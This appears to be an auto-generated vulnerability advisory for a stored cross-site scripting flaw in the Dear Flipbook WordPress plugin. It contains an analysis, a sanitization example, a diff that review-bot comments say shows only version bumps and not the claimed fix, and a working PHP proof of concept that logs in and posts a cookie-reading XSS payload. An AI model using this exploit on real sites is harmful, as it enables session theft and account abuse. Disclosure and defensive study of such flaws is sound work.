Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-2569: Dear Flipbook <= 2.4.20 – Authenticated (Author+) Stored Cross-Site Scripting via PDF Page Labels (3d-flipbook-dflip-lite)

CVE ID CVE-2026-2569
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 2.4.20
Patched Version 2.4.27
Disclosed March 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2569:
The vulnerability exists in the Dear Flipbook WordPress plugin versions up to and including 2.4.20. The root cause is insufficient input sanitization and output escaping for PDF page label data processed by the plugin’s AJAX handlers. Attackers with Author-level or higher privileges can inject arbitrary JavaScript payloads into page labels when uploading or modifying PDF flipbooks. The plugin stores these unsanitized values in the WordPress database. When a user views a compromised flipbook, the stored JavaScript executes in their browser context.

Exploitation occurs via the plugin’s AJAX endpoints, specifically through the ‘dearflip_upload_pdf’ and ‘dearflip_save_book’ actions handled by admin-ajax.php. The attacker sends a POST request containing malicious HTML/JavaScript within the ‘pageLabels’ parameter or embedded within a crafted PDF metadata field. The plugin processes this parameter without proper validation before storing it.

Atomic Edge research confirms the patch in version 2.4.27 implements proper output escaping using esc_html() or similar WordPress sanitization functions when rendering page labels. The version number change in the plugin header indicates the fix. The plugin now escapes all user-controlled data before output in frontend templates, preventing script execution while preserving label display functionality.

Successful exploitation allows authenticated attackers with Author privileges to perform stored XSS attacks. Injected scripts can steal session cookies, redirect users to malicious sites, or perform actions on behalf of authenticated users. The vulnerability requires Author-level access, limiting immediate impact, but compromised Author accounts could affect all site visitors viewing the malicious flipbook.
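The fix described above is output escaping of stored page labels. The following is an added example, not DearFlip's code, of a hypothetical page-label save-and-render path showing the unsafe rendering beside the hardened one; it uses plain PHP stand-ins (strip_tags, htmlspecialchars) so it runs stand-alone, where a real plugin would call the WordPress equivalents sanitize_text_field() and esc_html().

```php
<?php
// Added example (not DearFlip's code). Constructed sample: a decoded
// "pageLabels" array as a hypothetical AJAX save handler might receive it,
// including one label that carries markup.
$pageLabels = [
    '1' => 'Normal Page',
    '2' => '<img src=x onerror=alert(document.cookie)>',
    '3' => 'Another Page',
];

// Input-side sanitization (WordPress equivalent: sanitize_text_field()).
// Strips tags and control characters, trims, and caps the length.
function sanitize_page_label(string $label): string {
    $label = strip_tags($label);
    $label = preg_replace('/[\x00-\x1F\x7F]/', '', $label);
    return mb_substr(trim($label), 0, 200);
}

// Unsafe rendering: what the vulnerable path does, raw concatenation.
function render_label_unsafe(string $label): string {
    return '<span class="df-label">' . $label . '</span>';
}

// Hardened rendering (WordPress equivalent: esc_html()). Escaping at output
// time also neutralises labels stored before the fix was deployed.
function render_label_safe(string $label): string {
    return '<span class="df-label">'
        . htmlspecialchars($label, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '</span>';
}

// Simulated save: only numeric page keys are accepted, values are sanitized.
$stored = [];
foreach ($pageLabels as $page => $label) {
    if (!ctype_digit((string) $page)) {
        continue;
    }
    $stored[(int) $page] = sanitize_page_label($label);
}

// Compare the two renderings of the raw (as-received) and stored labels.
foreach ($pageLabels as $page => $label) {
    echo "Page $page unsafe : " . render_label_unsafe($label) . "\n";
    echo "Page $page escaped: " . render_label_safe($label) . "\n";
    echo "Page $page stored : " . render_label_safe($stored[(int) $page]) . "\n";
}
```

Only the "unsafe" line for page 2 contains a live img tag; the escaped line shows it as inert &lt;img ...&gt; text and the stored line shows the tag stripped before it ever reached the database.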

Differential between vulnerable and patched code

Code Diff
--- a/3d-flipbook-dflip-lite/3d-flipbook-dflip-lite.php
+++ b/3d-flipbook-dflip-lite/3d-flipbook-dflip-lite.php
@@ -4,7 +4,7 @@
  * Plugin Name: 3D FlipBook : DearFlip Lite
  * Description: Realistic 3D Flip-books for WordPress <a href="https://dearflip.com/go/wp-lite-full-version" >Get Full Version Here</a><strong> NOTE : Deactivate this lite version before activating Full Version</strong>
  *
- * Version: 2.4.20
+ * Version: 2.4.27
  * Text Domain: 3d-flipbook-dflip-lite
  * Author: DearHive
  * Author URI: https://dearflip.com/go/wp-lite-author
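Review bot: the only change in this hunk is the `Version:` header string (`2.4.20` to `2.4.27`); the output escaping of page labels that the analysis credits to 2.4.27 is not part of this diff, so the hunk records the release bump rather than the fix. The hunk from the template or AJAX handler where esc_html() (or an equivalent) was added to the page-label output should be included so the differential substantiates the analysis.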
@@ -45,7 +45,7 @@
      *
      * @var string
      */
-    public $version = '2.4.20';
+    public $version = '2.4.27';

     /**
      * The name of the plugin.
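Review bot: same point for `public $version = '2.4.27';`, which keeps the property in sync with the header but carries no sanitization or escaping logic. The files that actually process or render the `pageLabels` data are what the "vulnerable vs patched" differential needs to show.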

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2569 - Dear Flipbook <= 2.4.20 - Authenticated (Author+) Stored Cross-Site Scripting via PDF Page Labels

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'author_user';
$password = 'author_password';

// Step 1: Authenticate to WordPress and obtain nonce
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';

// Create a session cookie jar
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_2026_2569');

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $admin_url,
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);

// Step 2: Extract the AJAX nonce from admin page
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=dearflip');
curl_setopt($ch, CURLOPT_POST, 0);
$admin_page = curl_exec($ch);

// Look for nonce in page (simplified - real implementation would parse HTML)
// Nonce is typically in a script tag or data attribute
preg_match('/"ajaxnonce"\s*:\s*"([a-f0-9]+)"/', $admin_page, $matches);
$ajax_nonce = $matches[1] ?? '';

// Step 3: Exploit the vulnerability via dearflip_upload_pdf action
// This simulates uploading a PDF with malicious page labels
$exploit_url = $target_url . '/wp-admin/admin-ajax.php';

$payload = json_encode([
    'pageLabels' => [
        '1' => 'Normal Page',
        '2' => '<img src=x onerror=alert(document.cookie)>', // XSS payload
        '3' => 'Another Page'
    ]
]);

curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'dearflip_upload_pdf',
    'nonce' => $ajax_nonce,
    'pdf_data' => $payload, // Contains malicious page labels
    'book_id' => 'new'
]));

$exploit_response = curl_exec($ch);
curl_close($ch);

// Clean up
unlink($cookie_file);

echo "Exploit attempt completed. Check response:\n";
echo $exploit_response;

?>
